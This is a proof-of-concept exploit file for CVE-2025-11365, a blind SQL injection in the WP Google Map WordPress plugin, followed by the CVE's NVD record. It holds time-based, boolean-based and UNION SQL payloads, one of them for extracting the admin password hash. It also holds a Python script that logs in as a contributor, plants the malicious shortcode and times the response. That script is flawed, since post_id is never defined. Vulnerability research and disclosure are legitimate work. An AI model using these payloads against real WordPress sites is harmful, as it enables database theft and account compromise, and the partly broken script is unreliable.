CVE-2025-11365

<?php /** * CVE-2025-11365 - WP Google Map Plugin Blind SQL Injection PoC * Vulnerability: Blind SQL Injection via 'id' parameter in 'google_map' shortcode * Affected: WP Google Map Plugin <= 1.0 * Required: Contributor-level WordPress access or above */ // PoC payload as WordPress shortcode content // Inject this shortcode into a post or page using a Contributor-level account // Time-based blind SQL injection payload $payload_time_based = '[google_map id="1 AND (SELECT SLEEP(5))-- -"]'; // Boolean-based blind SQL injection payload (extracts database version) $payload_boolean_based = '[google_map id="1 AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)=\'5\') THEN SLEEP(5) ELSE 0 END)-- -"]'; // Data extraction payload example (extracts admin password hash) $payload_data_extraction = '[google_map id="1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -"]'; // Python exploit example using requests library /* import requests import time target_url = "http://target-wordpress-site.com" username = "contributor_user" password = "contributor_password" # Step 1: Login to WordPress session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/', 'testcookie': '1' } session.post(target_url + '/wp-login.php', data=login_data) # Step 2: Create a new post with the malicious shortcode post_data = { 'post_title': 'Test Post', 'post_content': '[google_map id="1 AND IF(SUBSTRING(@@version,1,1)=\'5\',SLEEP(5),0)-- -"]', 'post_status': 'publish', 'post_type': 'post' } response = session.post(target_url + '/wp-admin/post-new.php', data=post_data) # Step 3: Measure response time to confirm blind SQL injection start_time = time.time() response = session.get(target_url + '/?p=' + str(post_id)) elapsed_time = time.time() - start_time if elapsed_time > 4: print("[+] Vulnerable! Response time: " + str(elapsed_time) + " seconds") else: print("[-] Not vulnerable or patched") */ echo "PoC payloads generated. Use Contributor-level account to inject shortcode into a post.\n"; echo "Time-based payload: " . $payload_time_based . "\n"; echo "Boolean-based payload: " . $payload_boolean_based . "\n"; ?>

{"cve": {"id": "CVE-2025-11365", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:42.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Google Map Plugin plugin for WordPress is vulnerable to blind SQL Injection via the 'id' parameter of the 'google_map' shortcode in all versions up to, and including, 1.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-google-map/trunk/shortcode.php#L8", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8ecc765-ae00-4091-81dc-e93f91bbd86e?source=cve", "source": "[email protected]"}]}}